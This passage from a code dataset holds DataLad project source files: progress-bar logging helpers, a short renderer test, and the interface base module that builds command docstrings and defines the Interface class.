'dlm_progress'):\n self._clear_all()\n self._other_handler.emit(record)\n self._refresh_all()\n return\n maint = getattr(record, 'dlm_progress_maint', None)\n if maint == 'clear':\n return self._clear_all()\n elif maint == 'refresh':\n return self._refresh_all()\n pid = getattr(record, 'dlm_progress')\n update = getattr(record, 'dlm_progress_update', None)\n # would be an actual message, not used ATM here,\n # and the record not passed to generic handler ATM\n # (filtered away by NoProgressLog)\n # so no final message is printed\n # msg = record.getMessage()\n if pid not in self.pbars:\n # this is new\n pbar = ui.get_progressbar(\n label=getattr(record, 'dlm_progress_label', ''),\n unit=getattr(record, 'dlm_progress_unit', ''),\n total=getattr(record, 'dlm_progress_total', None,),\n )\n pbar.start(initial=getattr(record, 'dlm_progress_initial', 0))\n self.pbars[pid] = pbar\n elif update is None:\n # not an update -> done\n # TODO if the other logging that is happening is less frontpage\n # we may want to actually \"print\" the completion message\n self.pbars.pop(pid).finish()\n else:\n # Check for an updated label.\n label = getattr(record, 'dlm_progress_label', None)\n if label is not None:\n self.pbars[pid].set_desc(label)\n # an update\n self.pbars[pid].update(\n update,\n increment=getattr(record, 'dlm_progress_increment', False),\n total=getattr(record, 'dlm_progress_total', None))\n\n def _refresh_all(self):\n for pb in self.pbars.values():\n pb.refresh()\n\n def _clear_all(self):\n # remove the progress bar\n for pb in self.pbars.values():\n pb.clear()\n\n\ndef filter_noninteractive_progress(logger, record):\n \"\"\"Companion of log_progress() to suppress undesired progress logging\n\n This filter is to be used with a log handler's addFilter() method\n for the case of a non-interactive session (e.g., pipe to log file).\n\n It inspects the log record for `dlm_progress_noninteractive_level`\n keys that can be injected via log_progress(noninteractive_level=).\n\n If a log-level was declared in this fashion, it will be evaluated\n against the logger's effective level, and records are discarded\n if their level is too low. If no log-level was declared, a log record\n passes this filter unconditionally.\n\n Parameters\n ----------\n logger: logging.Logger\n The logger instance whose effective level to check against.\n record:\n The log record to inspect.\n\n Returns\n -------\n bool\n \"\"\"\n level = getattr(record, \"dlm_progress_noninteractive_level\", None)\n return level is None or level >= logger.level\n\n\ndef log_progress(lgrcall, pid, *args, **kwargs):\n \"\"\"Emit progress log messages\n\n This helper can be used to handle progress reporting without having\n to maintain display mode specific code.\n\n Typical progress reporting via this function involves three types of\n calls:\n\n 1. Start reporting progress about a process\n 2. Update progress information about a process\n 3. Report completion of a process\n\n In order to be able to associate all three steps with a particular process,\n the `pid` identifier is used. This is an arbitrary string that must be\n chosen to be unique across all different, but simultaneously running\n progress reporting activities within a Python session. For many practical\n purposes this can be achieved by, for example, including path information\n in the identifier.\n\n To initialize a progress report this function is called without an\n `update` parameter. To report a progress update, this function is called\n with an `update` parameter. 
To finish a reporting on a particular activity\n a final call without an `update` parameter is required.\n\n\n Parameters\n ----------\n lgrcall : callable\n Something like lgr.debug or lgr.info\n pid : str\n Some kind of ID for the process the progress is reported on.\n *args : str\n Log message, and potential arguments\n total : int\n Max progress quantity of the process.\n label : str\n Process description. Should be very brief, goes in front of progress bar\n on the same line.\n unit : str\n Progress report unit. Should be very brief, goes after the progress bar\n on the same line.\n update : int\n To (or by) which quantity to advance the progress. Also see `increment`.\n increment : bool\n If set, `update` is interpreted as an incremental value, not absolute.\n initial : int\n If set, start value for progress bar\n noninteractive_level : int, optional\n In a non-interactive session where progress bars are not displayed,\n only log a progress report, if a logger's effective level includes the\n specified level. This can be useful logging all progress is inappropriate\n or too noisy for a log.\n maint : {'clear', 'refresh'}\n This is a special attribute that can be used by callers that are not\n actually reporting progress, but need to ensure that their (console)\n output does not interfere with any possibly ongoing progress reporting.\n Setting this attribute to 'clear' will cause the central ProgressHandler\n to temporarily stop the display of any active progress bars. With\n 'refresh', all active progress bars will be redisplayed. After a 'clear'\n individual progress bars would be reactivated upon the next update log\n message, even without an explicit 'refresh'.\n \"\"\"\n d = dict(\n # inject progress-related result properties as extra data\n {'dlm_progress_{}'.format(n): v for n, v in kwargs.items()\n # initial progress might be zero, but not sending it further\n # would signal to destroy the progress bar, hence test for 'not None'\n if v is not None},\n dlm_progress=pid)\n lgrcall(*args, extra=d)\n\n\n@optional_args\ndef with_result_progress(fn, label=\"Total\", unit=\" Files\", log_filter=None):\n \"\"\"Wrap a progress bar, with status counts, around a function.\n\n Parameters\n ----------\n fn : generator function\n This function should accept a collection of items as a\n positional argument and any number of keyword arguments. After\n processing each item in the collection, it should yield a status\n dict.\n log_filter : callable, optional\n If defined, only result records for which callable evaluates to True will be\n passed to log_progress\n\n label, unit : str\n Passed to log.log_progress.\n\n Returns\n -------\n A variant of `fn` that shows a progress bar. Note that the wrapped\n function is not a generator function; the status dicts will be\n returned as a list.\n \"\"\"\n # FIXME: This emulates annexrepo.ProcessAnnexProgressIndicators. 
It'd be\n # nice to rewire things so that it could be used directly.\n\n def count_str(count, verb, omg=False):\n if count:\n msg = \"{:d} {}\".format(count, verb)\n if omg:\n msg = colors.color_word(msg, colors.RED)\n return msg\n\n\n base_label = label\n\n def _wrap_with_result_progress_(items, *args, **kwargs):\n counts = defaultdict(int)\n\n pid = \"%s:%s\" % (fn, random.randint(0, 100000))\n\n label = base_label\n log_progress(lgr.info, pid,\n \"%s: starting\", label,\n total=len(items), label=label, unit=unit,\n noninteractive_level=5)\n\n for res in fn(items, *args, **kwargs):\n if not (log_filter and not log_filter(res)):\n counts[res[\"status\"]] += 1\n count_strs = (count_str(*args)\n for args in [(counts[\"notneeded\"], \"skipped\", False),\n (counts[\"error\"], \"failed\", True)])\n if counts[\"notneeded\"] or counts[\"error\"]:\n label = \"{} ({})\".format(\n base_label,\n \", \".join(filter(None, count_strs)))\n\n log_progress(\n lgr.error if res[\"status\"] == \"error\" else lgr.info,\n pid,\n \"%s: processed result%s\", base_label,\n \" for \" + res[\"path\"] if \"path\" in res else \"\",\n label=label, update=1, increment=True,\n noninteractive_level=5)\n yield res\n log_progress(lgr.info, pid, \"%s: done\", base_label,\n noninteractive_level=5)\n\n def _wrap_with_result_progress(items, *args, **kwargs):\n return list(_wrap_with_result_progress_(items, *args, **kwargs))\n\n return _wrap_with_result_progress_ \\\n if inspect.isgeneratorfunction(fn) \\\n else _wrap_with_result_progress\n\n\ndef with_progress(items, lgrcall=None, label=\"Total\", unit=\" Files\"):\n \"\"\"Wrap a progress bar, with status counts, around an iterable.\n\n Parameters\n ----------\n items : some iterable\n lgrcall: callable\n Callable for logging. If not specified - lgr.info is used\n label, unit : str\n Passed to log.log_progress.\n\n Yields\n ------\n Items of it while displaying the progress\n \"\"\"\n pid = \"with_progress-%d\" % random.randint(0, 100000)\n base_label = label\n if lgrcall is None:\n lgrcall = lgr.info\n\n label = base_label\n log_progress(lgrcall, pid,\n \"%s: starting\", label,\n total=len(items), label=label, unit=unit,\n noninteractive_level=5)\n\n for item in items:\n # Since we state \"processed\", and actual processing might be happening\n # outside on the yielded value, we will yield before stating that\n yield item\n log_progress(\n lgrcall,\n pid,\n \"%s: processed\", base_label,\n label=label, update=1, increment=True,\n noninteractive_level=5)\n log_progress(lgr.info, pid, \"%s: done\", base_label, noninteractive_level=5)\n\n\n@contextmanager\ndef no_progress():\n \"\"\"Context manager to clear progress bars for the duration of the context\"\"\"\n log_progress(lgr.info, None, 'Clear progress bars', maint='clear',\n noninteractive_level=5)\n yield\n log_progress(lgr.info, None, 'Refresh progress bars', maint='refresh',\n noninteractive_level=5)\n\n\nclass LoggerHelper(object):\n \"\"\"Helper to establish and control a Logger\"\"\"\n\n def __init__(self, name='datalad', logtarget=None):\n \"\"\"\n\n Parameters\n ----------\n name :\n logtarget : string, optional\n If we want to use our logger for other log targets, while having\n a uniform control over them\n \"\"\"\n self.name = name\n self.logtarget = logtarget\n self.lgr = logging.getLogger(logtarget if logtarget is not None else name)\n\n def _get_config(self, var, default=None):\n from datalad import cfg\n return cfg.get(self.name.lower() + '.log.' 
+ var, default)\n\n def set_level(self, level=None, default='INFO'):\n \"\"\"Helper to set loglevel for an arbitrary logger\n\n By default operates for 'datalad'.\n TODO: deduce name from upper module name so it could be reused without changes\n \"\"\"\n if level is None:\n # see if nothing in the environment\n level = self._get_config('level')\n if level is None:\n level = default\n\n try:\n # it might be a string which still represents an int\n log_level = int(level)\n except ValueError:\n # or a string which corresponds to a constant;)\n log_level = getattr(logging, level.upper())\n\n self.lgr.setLevel(log_level)\n # and set other related/used loggers to the same level to prevent their\n # talkativity, if they are not yet known to this python session, so we\n # have little chance to \"override\" possibly set outside levels\n for dep in ('git',):\n if dep not in logging.Logger.manager.loggerDict:\n logging.getLogger(dep).setLevel(log_level)\n\n def get_initialized_logger(self, logtarget=None):\n \"\"\"Initialize and return the logger\n\n Parameters\n ----------\n logtarget: {'stderr', str }, optional\n Where to direct the logs. 'stderr' stands for the standard stream.\n Any other string is considered a filename. Multiple entries could be\n specified comma-separated\n\n Returns\n -------\n logging.Logger\n \"\"\"\n if not logtarget:\n logtarget = self._get_config('target', 'stderr')\n\n # Allow for multiple handlers being specified, comma-separated\n if ',' in logtarget:\n for handler_ in logtarget.split(','):\n self.get_initialized_logger(logtarget=handler_)\n return self.lgr\n\n if logtarget.lower() == 'stderr':\n loghandler = logging.StreamHandler(sys.stderr)\n use_color = is_interactive() # explicitly decide here\n elif logtarget.lower() == 'stdout':\n warnings.warn(\"'stdout' was discontinued as valid log target and \"\n \"will be ignored.\", DeprecationWarning)\n else:\n # must be a simple filename\n # Use RotatingFileHandler for possible future parametrization to keep\n # log succinct and rotating\n loghandler = logging.handlers.RotatingFileHandler(logtarget)\n use_color = False\n # I had decided not to guard this call and just raise exception to go\n # out happen that specified file location is not writable etc.\n\n for names_filter in 'names', 'namesre':\n names = self._get_config(names_filter, '')\n if names:\n import re\n # add a filter which would catch those\n class LogFilter(object):\n \"\"\"A log filter to filter based on the log target name(s)\"\"\"\n def __init__(self, names):\n self.target_names = set(n for n in names.split(',')) \\\n if names_filter == 'names' \\\n else re.compile(names)\n if names_filter == 'names':\n def filter(self, record):\n return record.name in self.target_names\n else:\n def filter(self, record):\n return self.target_names.match(record.name)\n\n loghandler.addFilter(LogFilter(names))\n\n # But now improve with colors and useful information such as time\n loghandler.setFormatter(\n ColorFormatter(use_color=use_color,\n # TODO: config log.name, pid\n log_name=self._get_config(\"name\", False),\n log_pid=self._get_config(\"pid\", False),\n ))\n # logging.Formatter('%(asctime)-15s %(levelname)-6s %(message)s'))\n if is_interactive():\n phandler = ProgressHandler(other_handler=loghandler)\n phandler.filters.extend(loghandler.filters)\n self.lgr.addHandler(phandler)\n else:\n loghandler.addFilter(partial(filter_noninteractive_progress,\n self.lgr))\n self.lgr.addHandler(loghandler)\n\n self.set_level() # set default logging level\n return 
self.lgr\n\n\nlgr = LoggerHelper().get_initialized_logger()\n" }, { "alpha_fraction": 0.5271317958831787, "alphanum_fraction": 0.5400516986846924, "avg_line_length": 15.69565200805664, "blob_id": "b25e137ac8cd39655b4471bbd21c3649e1f21532", "content_id": "cc56f8e728eda85847b97618c26b6a5112687412", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 387, "license_type": "permissive", "max_line_length": 42, "num_lines": 23, "path": "/datalad/cli/tests/test_renderer.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.tests.utils_pytest import eq_\n\nfrom ..renderer import (\n NA_STRING,\n nadict,\n nagen,\n)\n\n\ndef test_nagen():\n na = nagen()\n eq_(str(na), NA_STRING)\n eq_(repr(na), 'nagen()')\n assert na.unknown is na\n assert na['unknown'] is na\n\n eq_(str(nagen('-')), '-')\n\n\ndef test_nadict():\n d = nadict({1: 2})\n eq_(d[1], 2)\n eq_(str(d[2]), NA_STRING)\n\n\n\n" }, { "alpha_fraction": 0.6142823696136475, "alphanum_fraction": 0.6164463758468628, "avg_line_length": 34.65797805786133, "blob_id": "fb3f318213a154602e2e62d74e98b8a59668aff6", "content_id": "019e138517abc635f14640db718c88c6cb7337c7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34196, "license_type": "permissive", "max_line_length": 97, "num_lines": 959, "path": "/datalad/interface/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface generation\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport inspect\nimport logging\n\nlgr = logging.getLogger('datalad.interface.base')\n\nimport os\nimport re\nimport textwrap\nimport warnings\nfrom abc import (\n ABC,\n abstractmethod,\n)\n\nfrom functools import wraps\nfrom importlib import import_module\nfrom typing import (\n Callable,\n Dict,\n Generator,\n TypeVar,\n TYPE_CHECKING,\n)\n\nimport datalad\nfrom datalad import cfg as dlcfg\nfrom datalad.core.local.resulthooks import (\n get_jsonhooks_from_config,\n match_jsonhook2result,\n run_jsonhook,\n)\nfrom datalad.distribution.dataset import (\n Dataset,\n resolve_path,\n)\nfrom datalad.interface.common_opts import eval_params\nfrom datalad.interface.results import known_result_xfms\nfrom datalad.interface.utils import (\n get_result_filter,\n keep_result,\n render_action_summary,\n xfm_result,\n _process_results\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n IncompleteResultsError,\n)\nfrom datalad.utils import get_wrapped_class\n\ndefault_logchannels = {\n '': 'debug',\n 'ok': 'debug',\n 'notneeded': 'debug',\n 'impossible': 'warning',\n 'error': 'error',\n}\nif TYPE_CHECKING:\n from .base import Interface\n\nanInterface = TypeVar('anInterface', bound='Interface')\n\n\ndef get_api_name(intfspec):\n \"\"\"Given an interface specification return an API name for it\"\"\"\n if len(intfspec) > 3:\n name = intfspec[3]\n else:\n name = intfspec[0].split('.')[-1]\n return name\n\n\ndef get_interface_groups(include_plugins=False):\n \"\"\"Return a list of command groups.\n\n Returns\n 
-------\n A list of tuples with the form (GROUP_NAME, GROUP_DESCRIPTION, COMMANDS).\n \"\"\"\n if include_plugins:\n warnings.warn(\"Plugins are no longer supported.\", DeprecationWarning)\n\n from .. import interface as _interfaces\n\n grps = []\n # auto detect all available interfaces and generate a function-based\n # API from them\n for _item in _interfaces.__dict__:\n if not _item.startswith('_group_'):\n continue\n grp_name = _item[7:]\n grp = getattr(_interfaces, _item)\n grps.append((grp_name,) + grp)\n return grps\n\n\ndef get_cmd_summaries(descriptions, groups, width=79):\n \"\"\"Return summaries for the commands in `groups`.\n\n Parameters\n ----------\n descriptions : dict\n A map of group names to summaries.\n groups : list of tuples\n A list of groups and commands in the form described by\n `get_interface_groups`.\n width : int, optional\n The maximum width of each line in the summary text.\n\n Returns\n -------\n A list with a formatted entry for each command. The first command of each\n group is preceded by an entry describing the group.\n \"\"\"\n cmd_summary = []\n for grp in sorted(groups, key=lambda x: x[0]):\n grp_descr = grp[1]\n grp_cmds = descriptions[grp[0]]\n\n cmd_summary.append('\\n*%s*\\n' % (grp_descr,))\n for cd in grp_cmds:\n cmd_summary.append(' %s\\n%s'\n % ((cd[0],\n textwrap.fill(\n cd[1].rstrip(' .'),\n width - 5,\n initial_indent=' ' * 6,\n subsequent_indent=' ' * 6))))\n return cmd_summary\n\n\ndef load_interface(spec):\n \"\"\"Load and return the class for `spec`.\n\n Parameters\n ----------\n spec : tuple\n For a standard interface, the first item is the datalad source module\n and the second object name for the interface.\n\n Returns\n -------\n The interface class or, if importing the module fails, None.\n \"\"\"\n lgr.log(5, \"Importing module %s \", spec[0])\n try:\n mod = import_module(spec[0], package='datalad')\n except Exception as e:\n ce = CapturedException(e)\n lgr.error(\"Internal error, cannot import interface '%s': %s\",\n spec[0], ce)\n intf = None\n else:\n intf = getattr(mod, spec[1])\n return intf\n\n\ndef get_cmd_doc(interface):\n \"\"\"Return the documentation for the command defined by `interface`.\n\n Parameters\n ----------\n interface : subclass of Interface\n \"\"\"\n intf_doc = '' if interface.__doc__ is None else interface.__doc__.strip()\n if hasattr(interface, '_docs_'):\n # expand docs\n intf_doc = intf_doc.format(**interface._docs_)\n return intf_doc\n\n\ndef dedent_docstring(text):\n \"\"\"Remove uniform indentation from a multiline docstring\"\"\"\n # Problem is that first line might often have no offset, so might\n # need to be ignored from dedent call\n if text is None:\n return None\n if not text.startswith(' '):\n lines = text.split('\\n')\n if len(lines) == 1:\n # single line, no indentation, nothing to do\n return text\n text2 = '\\n'.join(lines[1:])\n return lines[0] + \"\\n\" + textwrap.dedent(text2)\n else:\n return textwrap.dedent(text)\n\n\ndef alter_interface_docs_for_api(docs):\n \"\"\"Apply modifications to interface docstrings for Python API use.\"\"\"\n # central place to alter the impression of docstrings,\n # like removing cmdline specific sections\n if not docs:\n return docs\n docs = dedent_docstring(docs)\n # clean cmdline sections\n docs = re.sub(\n r'\\|\\| CMDLINE \\>\\>.*?\\<\\< CMDLINE \\|\\|',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # clean cmdline in-line bits\n docs = re.sub(\n r'\\[CMD:\\s.*?\\sCMD\\]',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n docs = re.sub(\n 
r'\\[PY:\\s(.*?)\\sPY\\]',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # select only the python alternative from argument specifications\n docs = re.sub(\n r'``([a-zA-Z0-9_,.]+)\\|\\|([a-zA-Z0-9-,.]+)``',\n lambda match: f'``{match.group(1)}``',\n docs)\n docs = re.sub(\n r'\\|\\| PYTHON \\>\\>(.*?)\\<\\< PYTHON \\|\\|',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n if 'DATALAD_SPHINX_RUN' not in os.environ:\n # remove :role:`...` RST markup for cmdline docs\n docs = re.sub(\n r':\\S+:`[^`]*`[\\\\]*',\n lambda match: ':'.join(match.group(0).split(':')[2:]).strip('`\\\\'),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # make the handbook doc references more accessible\n # the URL is a redirect configured at readthedocs\n docs = re.sub(\n r'(handbook:[0-9]-[0-9]*)',\n '\\\\1 (http://handbook.datalad.org/symbols)',\n docs)\n docs = re.sub(\n r'^([ ]*)\\|\\| REFLOW \\>\\>\\n(.*?)\\<\\< REFLOW \\|\\|',\n lambda match: textwrap.fill(match.group(2), subsequent_indent=match.group(1)),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n return docs\n\n\ndef is_api_arg(arg):\n \"\"\"Return True if argument is our API argument or self or used for internal\n purposes\n \"\"\"\n return arg != 'self' and not arg.startswith('_')\n\n\ndef update_docstring_with_parameters(func, params, prefix=None, suffix=None,\n add_args=None):\n \"\"\"Generate a useful docstring from a parameter spec\n\n Amends any existing docstring of a callable with a textual\n description of its parameters. The Parameter spec needs to match\n the number and names of the callables arguments.\n \"\"\"\n from datalad.utils import getargspec\n\n # get the signature\n args, varargs, varkw, defaults = getargspec(func, include_kwonlyargs=True)\n defaults = defaults or tuple()\n if add_args:\n add_argnames = sorted(add_args.keys())\n args.extend(add_argnames)\n defaults = defaults + tuple(add_args[k] for k in add_argnames)\n ndefaults = len(defaults)\n # start documentation with what the callable brings with it\n doc = prefix if prefix else u''\n if len(args) > 1:\n if len(doc):\n if not doc.endswith('\\n'):\n doc += '\\n'\n doc += '\\n'\n doc += \"Parameters\\n----------\\n\"\n for i, arg in enumerate(args):\n if not is_api_arg(arg):\n continue\n # we need a parameter spec for each argument\n if not arg in params:\n raise ValueError(\"function has argument '%s' not described as a parameter\" % arg)\n param = params[arg]\n # validate the default -- to make sure that the parameter description is\n # somewhat OK\n defaults_idx = ndefaults - len(args) + i\n if defaults_idx >= 0:\n if param.constraints is not None:\n param.constraints(defaults[defaults_idx])\n orig_docs = param._doc\n param._doc = alter_interface_docs_for_api(param._doc)\n doc += param.get_autodoc(\n arg,\n default=defaults[defaults_idx] if defaults_idx >= 0 else None,\n has_default=defaults_idx >= 0)\n param._doc = orig_docs\n doc += '\\n'\n doc += suffix if suffix else u\"\"\n # assign the amended docs\n func.__doc__ = doc\n return func\n\n\n# TODO should export code_field and indicator, rather than have modes\n# TODO this should be a doc helper\ndef build_example(example, api='python'):\n \"\"\"Build a code example.\n\n Take a dict from a classes _example_ specification (list of dicts) and\n build a string with an api or cmd example (for use in cmd help or\n docstring).\n\n Parameters\n ----------\n api : {'python', 'cmdline'}\n If 'python', build Python example for docstring. 
If 'cmdline', build\n cmd example.\n\n Returns\n -------\n ex : str\n Concatenated examples for the given class.\n \"\"\"\n if api == 'python' :\n code_field='code_py'\n indicator='>'\n elif api == 'cmdline':\n code_field='code_cmd'\n indicator='%'\n else:\n raise ValueError(\"unknown API selection: {}\".format(api))\n if code_field not in example:\n # only show an example if it exist for the API\n return ''\n description = textwrap.fill(example.get('text'))\n # this indent the code snippet to get it properly rendered as code\n # we are not using textwrap.fill(), because it would not acknowledge\n # any meaningful structure/formatting of code snippets. Instead, we\n # maintain line content as is.\n code = dedent_docstring(example.get(code_field))\n needs_indicator = not code.startswith(indicator)\n code = textwrap.indent(code, ' ' * (5 if needs_indicator else 3)).lstrip()\n\n ex = \"\"\"{}::\\n\\n {}{}\\n\\n\"\"\".format(\n description,\n # disable automatic prefixing, if the example already has one\n # this enables providing more complex examples without having\n # to infer its inner structure\n '{} '.format(indicator)\n if needs_indicator\n # maintain spacing to avoid undesired relative indentation\n else '',\n code)\n\n return ex\n\n\ndef update_docstring_with_examples(cls_doc, ex):\n \"\"\"Update a commands docstring with examples.\n\n Take _examples_ of a command, build the Python examples, and append\n them to the docstring.\n\n Parameters\n ----------\n cls_doc: str\n docstring\n ex: list\n list of dicts with examples\n \"\"\"\n from textwrap import indent\n if len(cls_doc):\n cls_doc += \"\\n\"\n cls_doc += \" Examples\\n --------\\n\"\n # loop though provided examples\n for example in ex:\n cls_doc += indent(build_example(example, api='python'), ' '*4)\n\n return cls_doc\n\n\ndef build_doc(cls, **kwargs):\n \"\"\"Decorator to build docstrings for datalad commands\n\n It's intended to decorate the class, the __call__-method of which is the\n actual command. It expects that __call__-method to be decorated by\n eval_results.\n\n Note that values for any `eval_params` keys in `cls._params_` are\n ignored. This means one class may extend another's `_params_`\n without worrying about filtering out `eval_params`.\n\n Parameters\n ----------\n cls: Interface\n DataLad command implementation\n \"\"\"\n if datalad.in_librarymode():\n lgr.debug(\"Not assembling DataLad API docs in libary-mode\")\n return cls\n\n # Note, that this is a class decorator, which is executed only once when the\n # class is imported. It builds the docstring for the class' __call__ method\n # and returns the original class.\n #\n # This is because a decorator for the actual function would not be able to\n # behave like this. To build the docstring we need to access the attribute\n # _params of the class. From within a function decorator we cannot do this\n # during import time, since the class is being built in this very moment and\n # is not yet available in the module. 
And if we do it from within the part\n # of a function decorator, that is executed when the function is called, we\n # would need to actually call the command once in order to build this\n # docstring.\n\n lgr.debug(\"Building doc for %s\", cls)\n\n cls_doc = cls.__doc__\n if hasattr(cls, '_docs_'):\n # expand docs\n cls_doc = cls_doc.format(**cls._docs_)\n # get examples\n ex = getattr(cls, '_examples_', [])\n if ex:\n cls_doc = update_docstring_with_examples(cls_doc, ex)\n\n call_doc = None\n # suffix for update_docstring_with_parameters:\n if cls.__call__.__doc__:\n call_doc = cls.__call__.__doc__\n\n # build standard doc and insert eval_doc\n spec = getattr(cls, '_params_', dict())\n\n\n # update class attributes that may override defaults\n if not _has_eval_results_call(cls):\n add_args = None\n else:\n # defaults for all common parameters are guaranteed to be available\n # from the class\n add_args = {k: getattr(cls, k) for k in eval_params}\n\n # ATTN: An important consequence of this update() call is that it\n # fulfills the docstring's promise of overriding any existing\n # values for eval_params keys in _params_.\n #\n\n # get docs for eval_results parameters:\n spec.update(eval_params)\n\n update_docstring_with_parameters(\n cls.__call__, spec,\n prefix=alter_interface_docs_for_api(cls_doc),\n suffix=alter_interface_docs_for_api(call_doc),\n add_args=add_args\n )\n\n if hasattr(cls.__call__, '_dataset_method'):\n cls.__call__._dataset_method.__doc__ = cls.__call__.__doc__\n\n # return original\n return cls\n\n\nclass Interface(ABC):\n '''Abstract base class for DataLad command implementations\n\n Any DataLad command implementation must be derived from this class. The\n code snippet below shows a complete sketch of a Python class with such an\n implementation.\n\n Importantly, no instances of command classes will created. Instead the main\n entry point is a static ``__call__()`` method, which must be implemented\n for any command. It is incorporated as a function in :mod:`datalad.api`, by\n default under the name of the file the implementation resides (e.g.,\n ``command`` for a ``command.py`` file). Therefore the file should have a\n name that is a syntax-compliant function name. The default naming rule can\n be overwritten with an explicit alternative name (see\n :func:`datalad.interface.base.get_api_name`).\n\n For commands implementing functionality that is operating on DataLad\n datasets, a command can be also be bound to the\n :class:`~datalad.distribution.dataset.Dataset` class as a method using\n the ``@datasetmethod`` decorator, under the specified name.\n\n Any ``__call__()`` implementation should be decorated with\n :func:`datalad.interface.utils.eval_results`. This adds support for\n standard result processing, and a range of common command parameters that\n do not need to be manually added to the signature of ``__call__()``. Any\n implementation decorated in this way should be implemented as a generator,\n and ``yield`` :ref:`result records <chap_design_result_records>`.\n\n Any argument or keyword argument that appears in the signature of\n ``__call__()`` must have a matching item in :attr:`Interface._params_`.\n The dictionary maps argument names to\n :class:`datalad.support.param.Parameter` specifications. 
The specification\n contain CLI argument declarations, value constraint and data type\n conversation specifications, documentation, and optional\n ``argparse``-specific arguments for CLI parser construction.\n\n The class decorator :func:`datalad.interface.base.build_doc` inspects an\n :class:`Interface` implementation, and builds a standard docstring from\n various sources of structured information within the class (also see\n below). The documentation is automatically tuned differently, depending on\n the target API (Python vs CLI).\n\n .. code:: python\n\n @build_doc\n class ExampleCommand(Interface):\n \"\"\"SHORT DESCRIPTION\n\n LONG DESCRIPTION\n ...\n \"\"\"\n\n # COMMAND PARAMETER DEFINITIONS\n _params_ = dict(\n example=Parameter(\n args=(\"--example\",),\n doc=\"\"\"Parameter description....\"\"\",\n constraints=...),\n ...\n )\n )\n\n # RESULT PARAMETER OVERRIDES\n return_type= 'list'\n ...\n\n # USAGE EXAMPLES\n _examples_ = [\n dict(text=\"Example description...\",\n code_py=\"Example Python code...\",\n code_cmd=\"Example shell code ...\"),\n ...\n ]\n\n @staticmethod\n @datasetmethod(name='example_command')\n @eval_results\n def __call__(example=None, ...):\n ...\n\n yield dict(...)\n\n The basic implementation setup described above can be customized for\n individual commands in various way that alter the behavior and\n presentation of a specific command. The following overview uses\n the code comment markers in the above snippet to illustrate where\n in the class implementation these adjustments can be made.\n\n (SHORT/LONG) DESCRIPTION\n\n ``Interface.short_description`` can be defined to provide an\n explicit short description to be used in documentation and help output,\n replacing the auto-generated extract from the first line of the full\n description.\n\n COMMAND PARAMETER DEFINITIONS\n\n When a parameter specification declares ``Parameter(args=tuple(), ...)``,\n i.e. no arguments specified, it will be ignored by the CLI. Likewise, any\n ``Parameter`` specification for which :func:`is_api_arg` returns ``False``\n will also be ignored by the CLI. Additionally, any such parameter will\n not be added to the parameter description list in the Python docstring.\n\n RESULT PARAMETER OVERRIDES\n\n The :func:`datalad.interface.utils.eval_results` decorator automatically\n add a range of additional arguments to a command, which are defined in\n :py:data:`datalad.interface.common_opts.eval_params`. For any such\n parameter an Interface implementation can define an interface-specific\n default value, by declaring a class member with the respective parameter\n name and the desired default as its assigned value. This feature can be\n used to tune the default command behavior, for example, with respect to the\n default result rendering style, or its error behavior.\n\n In addition to the common parameters of the Python API, an additional\n ``Interface.result_renderer_cmdline`` can be defined, in order to\n instruct the CLI to prefer the specified alternative result renderer\n over an ``Interface.result_renderer`` specification.\n\n USAGE EXAMPLES\n\n Any number of usage examples can be described in an ``_examples_`` list\n class attribute. 
Such an example contains a description, and code examples\n for Python and CLI.\n '''\n _params_ = {}\n\n @abstractmethod\n def __call__():\n \"\"\"Must be implemented by any command\"\"\"\n\n # https://github.com/datalad/datalad/issues/6376\n @classmethod\n def get_refds_path(cls, dataset):\n \"\"\"Return a resolved reference dataset path from a `dataset` argument\n\n .. deprecated:: 0.16\n Use ``require_dataset()`` instead.\n \"\"\"\n # theoretically a dataset could come in as a relative path -> resolve\n if dataset is None:\n return dataset\n refds_path = dataset.path if isinstance(dataset, Dataset) \\\n else Dataset(dataset).path\n if refds_path:\n refds_path = str(resolve_path(refds_path))\n return refds_path\n\n\n# pull all defaults from all eval_results() related parameters and assign them\n# as attributes to the class, which then becomes the one place to query for\n# default and potential overrides\nfor k, p in eval_params.items():\n setattr(Interface,\n # name is always given\n k,\n # but there may be no default (rather unlikely, though)\n p.cmd_kwargs.get('default', None))\n\n\ndef get_allargs_as_kwargs(call, args, kwargs):\n \"\"\"Generate a kwargs dict from a call signature and ``*args``, ``**kwargs``\n\n Basically resolving the argnames for all positional arguments, and\n resolving the defaults for all kwargs that are not given in a kwargs\n dict\n \"\"\"\n from datalad.utils import getargspec\n argspec = getargspec(call, include_kwonlyargs=True)\n defaults = argspec.defaults\n nargs = len(argspec.args)\n defaults = defaults or [] # ensure it is a list and not None\n assert (nargs >= len(defaults))\n # map any args to their name\n argmap = list(zip(argspec.args[:len(args)], args))\n kwargs_ = dict(argmap)\n # map defaults of kwargs to their names (update below)\n for k, v in zip(argspec.args[-len(defaults):], defaults):\n if k not in kwargs_:\n kwargs_[k] = v\n # update with provided kwarg args\n kwargs_.update(kwargs)\n # XXX we cannot assert the following, because our own highlevel\n # API commands support more kwargs than what is discoverable\n # from their signature...\n #assert (nargs == len(kwargs_))\n return kwargs_\n\n\n# Only needed to support command implementations before the introduction\n# of @eval_results\ndef _has_eval_results_call(cls):\n \"\"\"Return True if cls has a __call__ decorated with @eval_results\n \"\"\"\n return getattr(getattr(cls, '__call__', None), 